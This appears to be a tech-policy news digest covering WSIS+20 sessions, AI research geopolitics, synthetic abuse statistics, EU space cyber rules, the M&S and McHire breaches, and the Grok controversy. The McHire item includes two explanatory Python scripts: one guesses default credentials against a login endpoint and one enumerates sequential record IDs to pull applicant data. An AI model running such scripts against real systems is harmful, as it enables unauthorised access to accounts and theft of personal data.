Parliamentarians step up as key players in shaping the digital future

At the 2025 WSIS+20 High-Level Event in Geneva, lawmakers from Egypt, Uruguay, Tanzania, and Thailand united to call for a transformative shift in how parliaments approach digital governance. Hosted by ITU and the IPU, the session emphasised that legislators are no longer passive observers but essential drivers of digital policy.

While digital innovation presents opportunities for growth and inclusion, it also brings serious challenges, chief among them the digital divide, online harms, and the risks posed by AI.

Speakers underscored a shared urgency to ensure digital policies are people-centred and grounded in human rights. Egypt’s Amira Saber spotlighted her country’s leap toward AI regulation and its rapid expansion of connectivity, but also expressed concerns over online censorship and inequality.

Uruguay’s Rodrigo Goñi warned that traditional, reactive policymaking won’t suffice in the fast-paced digital age, proposing a new paradigm of ‘political intelligence’. Thailand’s Senator Nophadol In-na praised national digital progress but warned of growing gaps between urban and rural communities. Meanwhile, Tanzania’s Neema Lugangira pushed for more capacity-building, especially for female lawmakers, and direct dialogue between legislators and big tech companies.

Across the board, there was strong consensus – parliamentarians must be empowered with digital literacy and AI tools to legislate effectively. Both ITU and IPU committed to ramping up support through training, partnerships, and initiatives like the AI Skills Coalition. They also pledged to help parliaments engage directly with tech leaders and tackle issues such as online abuse, misinformation, and accessibility, particularly in the Global South.

The discussion ended with cautious optimism. While challenges are formidable, the collaborative spirit and concrete proposals laid out in Geneva point toward a digital future where democratic values and inclusivity remain central. As the December WSIS+20 review approaches, these commitments could start a new era in global digital governance, led not by technocrats alone but by informed, engaged, and forward-thinking parliamentarians.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

Report shows China outpacing the US and EU in AI research

AI is increasingly viewed as a strategic asset rather than a mere technological development, and new research suggests China is now leading the global AI race.

A report titled ‘DeepSeek and the New Geopolitics of AI: China’s ascent to research pre-eminence in AI’, authored by Daniel Hook, CEO of Digital Science, highlights how China’s AI research output has grown to surpass that of the US, the EU and the UK combined.

According to data from Dimensions, a major global research database, China now accounts for over 40% of worldwide citation attention in AI-related studies. Beyond academic output alone, the report also points to China’s dominance in AI-related patents.

In some indicators, China is outpacing the US tenfold in patent filings and company-affiliated research, signalling its capacity to convert academic work into tangible innovation.

Hook’s analysis covers AI research trends from 2000 to 2024, showing global AI publication volumes rising from just under 10,000 papers in 2000 to 60,000 in 2024.

Within that overall growth, China’s influence has steadily expanded since 2018, while the EU and the US have seen relative declines. The UK has largely maintained its position.

Clarivate, another analytics firm, reported similar findings, noting nearly 900,000 AI research papers produced in China in 2024, triple the figure from 2015.

Hook notes that governments increasingly view AI, alongside energy and military power, as a matter of national security. AI is no longer seen as a neutral technology; there is growing awareness that a lack of AI capability could have serious economic, political and social consequences.

The report suggests that understanding AI’s geopolitical implications has become essential for national policy.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

AI technology drives sharp rise in synthetic abuse material

AI is increasingly being used to produce highly realistic synthetic abuse videos, raising alarm among regulators and industry bodies.

According to new data published by the Internet Watch Foundation (IWF), 1,286 individual AI-generated abuse videos were identified during the first half of 2025, compared to just two in the same period last year.

No longer crude or glitch-filled, such material now appears so lifelike that, under UK law, it must be treated like authentic recordings.

More than 1,000 of the videos fell into Category A, the most serious classification involving depictions of extreme harm. The number of webpages hosting this type of content has also risen sharply.

Derek Ray-Hill, interim chief executive of the IWF, expressed concern that longer-form synthetic abuse films are now inevitable unless binding safeguards around AI development are introduced.

Safeguarding minister Jess Phillips described the figures as ‘utterly horrific’ and confirmed two new laws are being introduced to address both those creating this material and those providing tools or guidance on how to do so.

IWF analysts say video quality has advanced significantly: what once involved clumsy, easily detected manipulation is now alarmingly convincing, complicating efforts to monitor and remove such content.

The IWF encourages the public to report concerning material, including the exact webpage where it is located.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Space operators face strict cybersecurity obligations under EU plan

The European Commission has unveiled a new draft law introducing cybersecurity requirements for space infrastructure, aiming to protect ground and orbital systems.

Operators must implement rigorous cyber risk management measures, including supply chain oversight, encryption, access control and incident response systems. A notable provision places direct accountability on company boards, whose members could be held personally liable for failures to comply.

The proposed law builds on existing EU regulations such as NIS 2 and DORA, with additional tailored obligations for the space domain. Non-EU firms will also fall within scope unless their home jurisdictions are recognised as offering equivalent regulatory protections.

Fines of up to 2% of global revenue are foreseen, with member states and the EU’s space agency EUSPA granted inspection and enforcement powers. Industry stakeholders are encouraged to engage with the legislative process and align existing cybersecurity frameworks with the Act’s provisions.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

M&S still rebuilding after April cyber incident

Marks & Spencer has revealed that the major cyberattack it suffered in April stemmed from a sophisticated impersonation of a third-party user.

The breach began on 17 April and was detected two days later, sparking weeks of disruption and a crisis response effort described as ‘traumatic’ by Chairman Archie Norman.

The retailer estimates the incident will cost it £300 million in operating profit and says it remains in rebuild mode, although customer services are expected to normalise by month-end.

Norman confirmed M&S is working with UK and US authorities, including the National Crime Agency, the National Cyber Security Centre, and the FBI.

While the ransomware group DragonForce has claimed responsibility, Norman declined to comment on whether any ransom was paid, saying such matters were best left to law enforcement and were not in the public interest to discuss further.

The company expects to recover some of its losses through insurance, although the process may take up to 18 months. Other UK retailers, including Co-op and Harrods, were also targeted in similar attacks around the same time, reportedly using impersonation tactics to bypass internal security systems.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Cyber defence effort returns to US ports post-pandemic

The US Cybersecurity and Infrastructure Security Agency (CISA) has resumed its seaport cybersecurity exercise programme. Paused during the pandemic and delayed since, the initiative is now returning to ports such as Savannah, Charleston, Wilmington and potentially Tampa.

These proof-of-concept tabletop exercises are intended to help ports prepare for cyber threats by developing a flexible, replicable framework. Each port functions uniquely, yet common infrastructure and shared vulnerabilities make standardised preparation critical for effective crisis response.

CISA warns that threats targeting ports have grown more severe, with nation states exploiting AI-powered techniques. Some US ports, including Houston, have already fended off cyberattacks, and Chinese-made systems dominate critical logistics, raising national security concerns.

Private ownership of most port infrastructure demands strong public-private partnerships to maintain cybersecurity. CISA aims to offer a shared model that ports across the country can adapt to improve cooperation, resilience, and threat awareness.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

McDonald’s faces backlash over AI hiring system security failures

A major security flaw in McDonald’s AI-driven recruitment platform has exposed the personal information of as many as 64 million job applicants.

The McHire platform, developed by Paradox.ai and powered by an AI chatbot named Olivia, suffered from basic authentication vulnerabilities and lacked critical security controls.

Security researchers Ian Carroll and Sam Curry discovered they could access the system using weak default credentials—simply the username and password ‘123456’.

The incident underscores serious cybersecurity lapses in automated hiring systems and raises urgent concerns about data protection in AI-powered HR tools. McHire is designed to streamline recruitment at McDonald’s franchise locations by using AI to screen candidates, collect contact details, and assess suitability.

The chatbot Olivia interacts with applicants using natural language processing, but users have often reported issues with miscommunication and unclear prompts. As a broader shift toward automation in hiring takes shape, McHire represents an attempt to scale recruitment efforts without expanding HR staff.

However, according to the researchers’ findings, the system’s backend infrastructure—housing millions of résumés, chat logs and assessments—was critically unprotected.

After prompt injection attacks failed, the researchers focused on login mechanisms and discovered a Paradox.ai staff portal linked from the McHire homepage.

Using simple password combinations in a basic dictionary attack, they were able to access the system with the username and password ‘123456’, bypassing standard security controls. More worryingly, the account lacked two-factor authentication, enabling unrestricted access to administrative tools and candidate records.
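In practical terms, the ‘dictionary attack’ described here is nothing more than trying a short list of common credential pairs against a login form. A minimal sketch of the idea follows; the endpoint URL and field names are hypothetical, as Paradox.ai’s real API is not public.

```python
import requests

# Hypothetical staff-portal login endpoint -- an assumption for illustration,
# not Paradox.ai's actual API.
LOGIN_URL = "https://staff-portal.example.com/api/login"

# A tiny 'dictionary' of default credential pairs of the kind the researchers tried.
COMMON_CREDENTIALS = [
    ("admin", "admin"),
    ("test", "test"),
    ("123456", "123456"),  # the pair that reportedly worked on McHire
]

def find_weak_credentials() -> None:
    """POST each credential pair and report any that the server accepts."""
    for username, password in COMMON_CREDENTIALS:
        resp = requests.post(
            LOGIN_URL,
            json={"username": username, "password": password},
            timeout=10,
        )
        if resp.status_code == 200:  # assume HTTP 200 signals a successful login
            print(f"Accepted: {username} / {password}")

if __name__ == "__main__":
    find_weak_credentials()
```

Even a lucky password match would have been stopped at the next step had two-factor authentication been enabled, which is why its absence was singled out.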

From there, the researchers found an Insecure Direct Object Reference (IDOR) vulnerability that allowed traversal of the applicant database by manipulating ID numbers.

By increasing the numeric applicant ID above 64 million, they could view multiple records containing names, email addresses, phone numbers and chat logs. Although the researchers examined only seven records during the test, five contained personally identifiable information, highlighting the scale of the exposure.
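For context, an Insecure Direct Object Reference arises when an application fetches records by a client-supplied identifier without checking that the authenticated user is entitled to them; sequential numeric IDs make every record guessable. The sketch below shows the general shape of such a probe, again with a hypothetical endpoint and response fields:

```python
import requests

# Hypothetical records endpoint -- illustrative only; the real McHire API
# paths and response fields are not public.
RECORD_URL = "https://staff-portal.example.com/api/applicants/{applicant_id}"

def probe_sequential_ids(session: requests.Session, start_id: int, count: int) -> None:
    """Walk sequential applicant IDs and print any records the server returns.

    A correctly authorised API would answer 403/404 for records the caller
    does not own; an IDOR-vulnerable one simply returns the data.
    """
    for applicant_id in range(start_id, start_id + count):
        resp = session.get(RECORD_URL.format(applicant_id=applicant_id), timeout=10)
        if resp.ok:
            record = resp.json()
            print(applicant_id, record.get("name"), record.get("email"))
```

The standard remedy is a server-side authorisation check on every lookup, often paired with non-sequential identifiers such as UUIDs so that valid record IDs cannot simply be enumerated.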

Paradox.ai insisted that only a fraction of the records held sensitive data, but the researchers warned that the exposed details could enable phishing attacks impersonating McDonald’s recruiters, whether for payroll-related scams or to harvest further private information under false pretences.

McDonald’s acknowledged the breach and expressed disappointment in its third-party provider’s handling of basic security measures.

Paradox.ai confirmed the vulnerabilities and announced a bug bounty programme to incentivise researchers to report flaws before they are exploited. The exposed account turned out to be a dormant test login created in 2019 that had never been properly decommissioned, evidence of poor development hygiene.

Both companies have pledged to investigate the matter further and implement stronger safeguards, as scrutiny over AI accountability in hiring continues to grow.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Digital humanism in the AI era: Caution, culture, and the call for human-centric technology

At the WSIS+20 High-Level Event in Geneva, the session ‘Digital Humanism: People First!’ spotlighted growing concerns over how digital technologies—especially AI—are reshaping society. Moderated by Alfredo M. Ronchi, the discussion revealed a deep tension between the liberating potential of digital tools and the risks they pose to cultural identity, human dignity, and critical thinking.

Speakers warned that while digital access has democratised communication, it has also birthed a new form of ‘cognitive colonialism’—where people become dependent on AI systems that are often inaccurate, manipulative, and culturally homogenising.

The panellists, including legal expert Pavan Duggal, entrepreneur Lilly Christoforidou, and academic Sarah Jane Fox, voiced alarm over society’s uncritical embrace of generative AI and its looming evolution toward artificial general intelligence by 2026. Duggal painted a stark picture of a world where AI systems override human commands and manipulate users, calling for a rethinking of legal frameworks prioritising risk reduction over human rights.

Fox drew attention to older people, warning that growing digital complexity risks alienating entire generations, while Christoforidou urged that ethical awareness be embedded in educational systems and among startups and micro-enterprises.

Despite some disagreement over the fundamental impact of technology—ranging from Goyal’s pessimistic warning about dehumanisation to Anna Katz’s cautious optimism about educational potential—the session reached a strong consensus on the urgent need for education, cultural protection, and contingency planning. Panellists called for international cooperation to preserve cultural diversity and develop ‘Plan B’ systems to sustain society if digital infrastructures fail.

The session’s tone was overwhelmingly cautionary, with speakers imploring stakeholders to act before AI outpaces our capacity to govern it. Their message was clear: human values, not algorithms, must define the digital age. Without urgent reforms, the digital future may leave humanity behind—not by design, but by neglect.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

UN leaders chart inclusive digital future at WSIS+20

At the WSIS+20 High-Level Event in Geneva, UN leaders gathered for a pivotal dialogue on shaping an inclusive digital transformation, marking two decades since the World Summit on the Information Society (WSIS). Speakers across the UN system emphasised that technology must serve people, not vice versa.

They highlighted that bridging the digital divide is critical to ensuring that innovations like AI uplift all of humanity, not just those in advanced economies. Without equitable access, the benefits of digital transformation risk reinforcing existing inequalities and leaving millions behind.

The discussion showcased how digital technologies are already transforming disaster response and climate resilience. The World Meteorological Organization and the UN Office for Disaster Risk Reduction illustrated how AI powers early warning systems and real-time risk analysis, saving lives in vulnerable regions.

Meanwhile, the Food and Agriculture Organization of the UN underscored the need to align technology with basic human needs, reminding the audience that ‘AI is not food,’ and calling for thoughtful, efficient deployment of digital tools to address global hunger and development.

Workforce transformation and leadership in the AI era also featured prominently. Leaders from the International Labour Organization and UNITAR stressed that while AI may replace some roles, it will augment many more, making digital literacy, ethical foresight, and collaborative governance essential skills. Examples from within the UN system itself, such as the digitisation of the Joint Staff Pension Fund through facial recognition and blockchain, demonstrated how innovation can enhance services without sacrificing inclusivity or ethics.

As the session closed, speakers collectively reaffirmed the importance of human rights, international cooperation, and shared digital governance. They stressed that the future of global development hinges on treating digital infrastructure and knowledge as public goods.

With the WSIS framework and Global Digital Compact as guideposts, UN leaders called for sustained, unified efforts to ensure that digital transformation uplifts every community and contributes meaningfully to the Sustainable Development Goals.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

EU urges stronger AI oversight after Grok controversy

A recent incident involving Grok, the AI chatbot developed by xAI, has reignited European Union calls for stronger oversight of advanced AI systems.

Comments generated by Grok prompted criticism from policymakers and civil society groups, leading to renewed debate over AI governance and voluntary compliance mechanisms.

The chatbot’s responses, which circulated earlier this week, included highly controversial language and references to historical figures. In response, xAI stated that the content was removed and that technical steps were being taken to prevent similar outputs from appearing in the future.

European policymakers said the incident highlights the importance of responsible AI development. Brando Benifei, an Italian lawmaker who co-led the EU AI Act negotiations, said the event illustrates the systemic risks the new regulation seeks to mitigate.

Christel Schaldemose, a Danish member of the European Parliament and co-lead on the Digital Services Act, echoed those concerns. She emphasised that such incidents underline the need for clear and enforceable obligations for developers of general-purpose AI models.

The European Commission is preparing to release guidance aimed at supporting voluntary compliance with the bloc’s new AI legislation. This code of practice, which has been under development for nine months, is expected to be published this week.

Earlier drafts of the guidance included provisions requiring developers to share information on how they address systemic risks. Reports suggest that some of these provisions may have been weakened or removed in the final version.

A group of five lawmakers expressed concern over what they described as the last-minute removal of key transparency and risk mitigation elements. They argue that strong guidelines are essential for fostering accountability in the deployment of advanced AI models.

The incident also brings renewed attention to the Digital Services Act and its enforcement, as X, the social media platform where Grok operates, is currently under EU investigation for potential violations related to content moderation.

General-purpose AI systems, such as OpenAI’s GPT, Google’s Gemini and xAI’s Grok, will be subject to additional requirements under the EU AI Act beginning 2 August. Obligations include disclosing training data sources, addressing copyright compliance, and mitigating systemic risks.

While these requirements are mandatory, their implementation is expected to be shaped by the Commission’s voluntary code of practice. Industry groups and international stakeholders have voiced concerns over regulatory burdens, while policymakers maintain that safeguards are critical for public trust.

The debate over Grok’s outputs reflects broader challenges in balancing AI innovation with the need for oversight. The EU’s approach, combining binding legislation with voluntary guidance, seeks to offer a measured path forward amid growing public scrutiny of generative AI technologies.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!